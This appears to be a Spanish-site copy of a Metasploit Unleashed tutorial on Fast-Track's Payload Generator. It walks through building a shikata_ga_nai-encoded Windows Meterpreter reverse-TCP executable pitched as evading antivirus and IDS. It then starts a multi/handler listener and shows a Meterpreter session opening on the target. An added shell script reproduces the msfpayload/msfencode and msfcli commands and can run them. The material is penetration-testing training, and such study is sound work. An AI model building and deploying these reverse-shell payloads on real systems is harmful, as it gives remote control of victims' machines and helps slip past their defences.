Payload Generator

From www.metasploit-es.com.ar


The Fast-Track payload generator builds Metasploit payloads for you at the click of a button. Remembering the msfpayload and msfencode command lines can be tedious, so the Fast-Track generator does that work for you and, optionally, starts the matching listener.

Fast-Track Main Menu:

    Fast-Track - Where it's OK to finish in under 3 minutes...
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1.  Fast-Track Updates
    2.  Autopwn Automation
    3.  Microsoft SQL Tools
    4.  Mass Client-Side Attack
    5.  Exploits
    6.  Binary to Hex Payload Converter
    7.  Payload Generator
    8.  Fast-Track Tutorials
    9.  Fast-Track Changelog
    10. Fast-Track Credits
    11. Exit

    Enter the number: 7
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.

#####################################
###                               ###
### Metasploit Payload Generator  ###
###                               ###
### Written by: Dave Kennedy      ###
### aka ReL1K                     ###
###                               ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.


What payload do you want to generate:

Name:                                Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC          Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter  Spawn a Meterpreter shell on victim through Reflective to attacker.

Enter choice (example 1-6): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 9090

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 310
Options: LHOST=10.211.55.130,LPORT=9090,ENCODING=shikata_ga_nai


A payload has been created in this directory and is named 'payload.exe'. Enjoy!


Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


Note that once the payload has been created, Fast-Track can automatically set up a listener (exploit/multi/handler) to accept the connection back. All that remains is to get the executable onto the remote system. Once it runs there:

***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 10.211.55.130 on Local Port: 9090 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:9090 -> 10.211.55.128:1078)

meterpreter >

We have just seen how to create payloads with Fast-Track and, using a payload built by the Metasploit Framework, obtain a Meterpreter session on the target system.
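The commands that Fast-Track runs behind the menu above are not shown on the page; the following POSIX shell script is an added example (not Fast-Track's or Metasploit's own code) that reproduces them for the transcript's choices: payload windows/meterpreter/reverse_tcp, encoder shikata_ga_nai, LHOST 10.211.55.130, LPORT 9090. It assumes the 2009-era tools msfpayload, msfencode and msfcli on PATH (all three were later replaced by msfvenom and msfconsole), validates the LHOST and LPORT input that Fast-Track accepts unchecked, and adds ExitOnSession=false so the handler keeps accepting sessions instead of exiting after the first one. The encode count of 3 and the RUN=1 switch are choices made for this example.

```shell
#!/bin/sh
# Added example: the msfpayload | msfencode pipeline and the msfcli handler that
# Fast-Track's "Payload Generator" menu wraps. Assumes the legacy Metasploit 3.x
# tools (msfpayload, msfencode, msfcli) are on PATH when executed with RUN=1.

PAYLOAD=windows/meterpreter/reverse_tcp
ENCODER=x86/shikata_ga_nai   # msfencode names encoders with their architecture prefix

# Return 0 if $1 is a dotted-quad IPv4 address whose octets are all in 0-255.
valid_ipv4() {
    addr=$1
    echo "$addr" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    # Split on "." in a subshell so the caller's IFS is untouched.
    ( IFS=.; set -- $addr; for o; do [ "$o" -le 255 ] || exit 1; done )
}

# Return 0 if $1 is a TCP port in 1-65535 (digits only).
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the pipeline that produces payload.exe for LHOST=$1 LPORT=$2:
# msfpayload emits raw shellcode (R), msfencode encodes it 3 times and wraps it in a PE.
build_cmd() {
    valid_ipv4 "$1" || { echo "bad LHOST: $1" >&2; return 1; }
    valid_port "$2" || { echo "bad LPORT: $2" >&2; return 1; }
    printf 'msfpayload %s LHOST=%s LPORT=%s R | msfencode -e %s -c 3 -t exe -o payload.exe\n' \
        "$PAYLOAD" "$1" "$2" "$ENCODER"
}

# Print the msfcli command for the matching listener. ExitOnSession=false keeps
# the handler alive after the first session; E tells msfcli to execute it.
handler_cmd() {
    valid_ipv4 "$1" || { echo "bad LHOST: $1" >&2; return 1; }
    valid_port "$2" || { echo "bad LPORT: $2" >&2; return 1; }
    printf 'msfcli exploit/multi/handler PAYLOAD=%s LHOST=%s LPORT=%s ExitOnSession=false E\n' \
        "$PAYLOAD" "$1" "$2"
}

# Usage: sh fasttrack_manual.sh 10.211.55.130 9090        (dry run: only prints the commands)
#        RUN=1 sh fasttrack_manual.sh 10.211.55.130 9090  (also executes them)
if [ -n "$1" ]; then
    build_cmd "$1" "$2" && handler_cmd "$1" "$2" || exit 1
    if [ "${RUN:-0}" = 1 ]; then
        eval "$(build_cmd "$1" "$2")" && eval "$(handler_cmd "$1" "$2")"
    fi
fi
```

Two caveats the transcript above makes visible. First, the handler reports "binding to LHOST 0.0.0.0": it listens on every interface of the attacking host, not only on 10.211.55.130, so on a multi-homed box restrict port 9090 with a host firewall. Second, the tool's claim that encoding "gets past most AV and IDS/IPS" was optimistic even in 2009; shikata_ga_nai output is signatured by every mainstream engine today and should be treated as a format-conversion step, not an evasion technique.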



© Offensive Security 2009

Original by www.offensive-security.com/metasploit-unleashed/
Translated by tundervirld